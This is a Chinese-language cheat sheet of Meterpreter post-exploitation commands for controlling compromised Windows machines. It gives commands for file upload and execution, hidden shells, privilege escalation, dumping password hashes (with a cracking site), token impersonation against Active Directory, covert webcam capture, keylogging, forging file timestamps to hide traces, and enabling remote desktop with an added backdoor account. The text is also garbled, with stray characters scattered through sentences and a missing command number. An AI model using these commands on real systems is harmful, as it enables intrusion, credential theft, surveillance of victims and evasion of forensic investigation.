?meterpreter后期攻擊使用方法

1厉熟、上傳文件到Windows主機(jī)

upload?<file>?<destination>?

命令2：從windows主機(jī)下載文件

download?<file>?<path?to?save>?

注意：Windows路徑要使用雙斜線

命令3：在目標(biāo)主機(jī)上執(zhí)行exe文件

execute?-f?<path>?[options]?

?例：execute -f c://1.exe?

命令4：創(chuàng)建CMD新通道

execute?-f?cmd?-c?

命令5：顯示進(jìn)程（相當(dāng)于打開任務(wù)管理器）

ps命令會(huì)顯示目標(biāo)主機(jī)上所有正在運(yùn)行的進(jìn)程

命令：

ps?

命令6：獲取目標(biāo)主機(jī)的cmd shell

shell命令可以進(jìn)入目標(biāo)主機(jī)的cmd

命令：shell?

命令7：獲取admin權(quán)限

getsystem命令可以提權(quán)到本地系統(tǒng)權(quán)限

命令：getsystem?

命令8：使用Hashdump轉(zhuǎn)儲(chǔ)所有hash值

我們可以使用meterpreter shell來dump目標(biāo)主機(jī)的當(dāng)前系統(tǒng)賬戶和密碼邦危。轉(zhuǎn)儲(chǔ)的內(nèi)容是NTML哈希格式誉券，網(wǎng)上有很多工具和技巧來破解它們退子。

NTLM在線破解：https://hashkiller.co.uk/ntlm-decrypter.aspx

命令：hashdump?

輸出的每一行內(nèi)容格式如下

Username:SID:LM?hash:NTLM?hash::: （重點(diǎn)：每個(gè)Windows用戶都有自己唯一的SID窒所。

Windows系統(tǒng)管理員administrator的UID是500眉菱，普通用戶UID從1000開始。

）（SID也就是安全標(biāo)識(shí)符（Security Identifiers）拐格，是標(biāo)識(shí)用戶僧免、組和計(jì)算機(jī)帳戶的唯一的號(hào)碼。）

命令10：創(chuàng)建端口轉(zhuǎn)發(fā)（了解）

meterpreter shell中的portfwd命令是轉(zhuǎn)發(fā)技術(shù)中最常用的一個(gè)命令捏浊，可以讓攻擊系統(tǒng)訪問本來無法直接訪問的目標(biāo)主機(jī)懂衩。

add選項(xiàng)會(huì)將端口轉(zhuǎn)發(fā)添加到列表中，而且本質(zhì)上會(huì)創(chuàng)建一個(gè)隧道金踪。

請(qǐng)注意：這個(gè)隧道存在于meterpreter控制臺(tái)之外浊洞，任何終端會(huì)話都可以使用。

命令：portfwd add -l 6666 -p 3389 -r 127.0.0.1 #將目標(biāo)機(jī)的3389端口轉(zhuǎn)發(fā)到本地6666端口

命令11：刪除端口轉(zhuǎn)發(fā)

跟創(chuàng)建端口轉(zhuǎn)發(fā)命令類似胡岔，這條命令是刪除一條端口轉(zhuǎn)發(fā)記錄

命令：

portfwd?delete?-l?<portnumber>?-p?<portnumber>?-r?<Target?IP>?

如果你想顯示所有端口轉(zhuǎn)發(fā)記錄法希，你可以使用portfwd list命令，如果你想刪除所有的記錄靶瘸，可以使用portfwd flush命令

命令12：在目標(biāo)主機(jī)上搜索文件

搜索命令可以來定位查找目標(biāo)主機(jī)上的特定文件苫亦。這個(gè)命令可以搜索整個(gè)文件系統(tǒng)，也可以搜索特定的文件夾怨咪。

例如屋剑，如果你想搜索目標(biāo)主機(jī)上的所有txt文件，可以使用下列命令：

命令：search?-f??*.txt?

命令13：獲取用戶ID

getuid命令會(huì)顯示主機(jī)上運(yùn)行meterpreter 服務(wù)的用戶

命令：getuid?

命令14：獲取系統(tǒng)信息

sysinfo命令會(huì)顯示系統(tǒng)名诗眨，操作系統(tǒng)唉匾，架構(gòu)和語言等。

命令：sysinfo?

命令15：模擬任意用戶(token操作)

（不一定百分百成功匠楚，但是有幾率巍膘。用戶之間不需要密碼，用token值來切換芋簿。）

這個(gè)進(jìn)程對(duì)于攻擊像微軟活動(dòng)目錄這樣的分布式系統(tǒng)非常有幫助峡懈，因?yàn)樵谖④浕顒?dòng)目錄中，本地訪問權(quán)限并沒多大用益咬，但是如果能搞到憑證尤其是管理員憑證，那就非常有用了。

incognito最開始是一個(gè)獨(dú)立的應(yīng)用幽告，當(dāng)你成功入侵系統(tǒng)后可以用它來模擬用戶tokens梅鹦。這個(gè)應(yīng)用后來集成到了metasploit，并且最終集成到了meterpreter中冗锁，使用如下：

在meterpreter會(huì)話中加載這個(gè)模塊非常簡單齐唆，只要輸入 use incognito命令即可

輸入list_tokens -u來顯示所有有效的tokens

然后我們需要模擬某個(gè)token來獲取其權(quán)限。還有注意冻河，如果成功模擬了一個(gè)token箍邮，我們可以使用getuid命令來檢查當(dāng)前用戶ID

1.use?incognito?

2.list_tokens?-u?

3.impersonate_token?“Machine\\user”?

命令16：webcam攝像頭命令

webcam_list ?#查看攝像頭

webcam_snap ??#通過攝像頭拍照

webcam_stream ??#通過攝像頭開啟視頻

命令17：execute執(zhí)行文件（這條不用記，看前面的就行）

execute #在目標(biāo)機(jī)中執(zhí)行文件

execute -H -i -f cmd.exe #創(chuàng)建新進(jìn)程cmd.exe叨叙，-H不可見锭弊，-i交互

命令18：timestomp偽造時(shí)間戳

timestomp C:// -h ??#查看幫助

timestomp -v C://2.txt ??#查看時(shí)間戳

timestomp C://2.txt -f C://1.txt #將1.txt的時(shí)間戳復(fù)制給2.txt

命令19：enable_rdp腳本開啟3389

run post/windows/manage/enable_rdp ?#開啟遠(yuǎn)程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用戶

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 ?#將3389端口轉(zhuǎn)發(fā)到6662

腳本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通過enable_rdp.rb腳本可知：開啟rdp是通過reg修改注冊(cè)表；添加用戶是調(diào)用cmd.exe 通過net user添加擂错；端口轉(zhuǎn)發(fā)是利用的portfwd命令

命令20：鍵盤記錄

keyscan_start ?#開始鍵盤記錄

keyscan_dump ??#導(dǎo)出記錄數(shù)據(jù)

keyscan_stop #結(jié)束鍵盤記錄